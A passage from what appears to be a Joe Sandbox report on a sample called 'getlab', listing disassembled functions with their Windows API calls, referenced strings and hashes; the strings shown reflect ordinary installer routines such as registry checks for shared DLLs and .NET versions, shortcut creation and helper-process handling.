                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                          • API String ID: 1452528299-3112430753
                                                                          • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                          • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                                          • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                          • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                                          Function 0045C9E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 0045C9FA
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                                            • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                          • API String ID: 59345061-4263478283
                                                                          • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                          • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                                          • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                          • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                                          Function 00456538 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                                          • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                                          • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                                          Strings
                                                                          • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                                          • CoCreateInstance, xrefs: 004565AB
                                                                          • IPersistFile::Save, xrefs: 004567FC
                                                                          • IPropertyStore::Commit, xrefs: 0045677D
                                                                          • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                                          • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance$FreeString
                                                                          • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                          • API String ID: 308859552-3936712486
                                                                          • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                          • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                                          • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                          • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                                          Function 0041B3A4 Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                                          • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                                          • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                                          • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                                          • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                                          • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                          • String ID:
                                                                          • API String ID: 359944910-0
                                                                          • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                          • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                                          • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                          • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                                          Function 00472930 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                          • API String ID: 971782779-3668018701
                                                                          • Opcode ID: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                                          • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                                          • Opcode Fuzzy Hash: ca3bd86af9356875fb255c0965e6d4b7c6ab4e57c2ddb924be80171e39f68e51
                                                                          • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                                          Function 00454848 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                                          • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                                          • RegOpenKeyEx, xrefs: 004548E4
                                                                          • , xrefs: 004548D2
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2812809588-1577016196
                                                                          • Opcode ID: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                                          • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                                          • Opcode Fuzzy Hash: 0e91def5215c87c363aa53ad37b130579f95eb5f388cba70c6f61ed9a91dbc8c
                                                                          • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                                          Function 00459278 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                                          Strings
                                                                          • .NET Framework version %s not found, xrefs: 00459429
                                                                          • v4.0.30319, xrefs: 00459311
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                                          • v1.1.4322, xrefs: 004593E2
                                                                          • v2.0.50727, xrefs: 0045937B
                                                                          • .NET Framework not found, xrefs: 0045943D
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Open
                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                          • API String ID: 2976201327-446240816
                                                                          • Opcode ID: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                                          • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                                          • Opcode Fuzzy Hash: 4a110fd54c67272918f155c84fd5e7c55fc1eb208e7566f68b065823514e3926
                                                                          • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                                          Function 00458864 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?), ref: 0045889B
                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                                          Strings
                                                                          • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                                          • Helper process exited., xrefs: 004588E5
                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                                          • Helper isn't responding; killing it., xrefs: 004588A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                          • API String ID: 3355656108-1243109208
                                                                          • Opcode ID: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                                          • Instruction ID: 5c1f132ce02699e8ecfae473a4aa832f70e08e49b07aa2054fbd8a494dc4d87a
                                                                          • Opcode Fuzzy Hash: dbcea0f0447e14293e2ba497c2ba511ba70dab0111fa353bc66056d4bed30cc0
                                                                          • Instruction Fuzzy Hash: 582171706087409AD710E779C44575BB6D4AF48309F00C82FB9DAD7693DE7CE8488B6B
                                                                          Function 004544FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DDDC: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE08
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 00454623
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546D3,?,00000000,00454797), ref: 0045475F
                                                                            • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                          Strings
                                                                          • RegCreateKeyEx, xrefs: 00454597
                                                                          • , xrefs: 00454585
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045453B
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045456B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2481121983-1280779767
                                                                          • Opcode ID: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                                          • Instruction ID: 79a928fbfbb5cbc52e9f584d13fa8ff479f10e23804a0d57af644d787f67e4fc
                                                                          • Opcode Fuzzy Hash: fb036eabf5a146f2d7e855c45c9778b44f21e44f1b6b00b130857789a6a7aa14
                                                                          • Instruction Fuzzy Hash: 4C812275A00209AFDB00DFD5C841BEEB7B9EF49305F50452AF900FB292D7789A49CB69
                                                                          Function 0049615C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00453890: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                            • Part of subcall function 00453890: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004961D9
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049632D), ref: 004961FA
                                                                          • CreateWindowExA.USER32(00000000,STATIC,0049633C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496221
                                                                          • SetWindowLongA.USER32(?,000000FC,004959B4), ref: 00496234
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC,0049633C), ref: 00496264
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004962D8
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000), ref: 004962E4
                                                                            • Part of subcall function 00453D04: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                          • 73A25CF0.USER32(?,00496307,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496300,?,?,000000FC,004959B4,00000000,STATIC), ref: 004962FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                          • API String ID: 170458502-2312673372
                                                                          • Opcode ID: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                                          • Instruction ID: 59c6668a25180793b9734d4b881d6428f2164d7595bd96eb0933aaec2009094d
                                                                          • Opcode Fuzzy Hash: 9b06694425e575e437806c69a3063783cd4ae9b2f688ab1fdd8fd86893ac9854
                                                                          • Instruction Fuzzy Hash: 30413070A00204AFDF11EBA5DD42FAE7BB8EB09714F61457AF500F7291D7799A048B68
                                                                          Function 0042E410 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 86registrylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E439
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E43F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E515,?,00000000,0047DD24,00000000), ref: 0042E48D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: %aE$.DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-4073108654
                                                                          • Opcode ID: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                                          • Instruction ID: 54e13c124a033066941eeca65415b1323707e8dcf3020f71d3dbb5d1a98da02b
                                                                          • Opcode Fuzzy Hash: 2da1f24d3b2dac621d95ef46090c641aa8f16fa50bf8c44a058beec2af7c6974
                                                                          • Instruction Fuzzy Hash: C5214430B10225BBDB00EAE7DC45B9E76B8EB48708F904477A500E7281E77CDE419B1C
                                                                          Function 00462818 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 00462824
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462838
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462845
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462852
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0046289E
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004628DC
                                                                          Strings
                                                                          Memory Dump Source
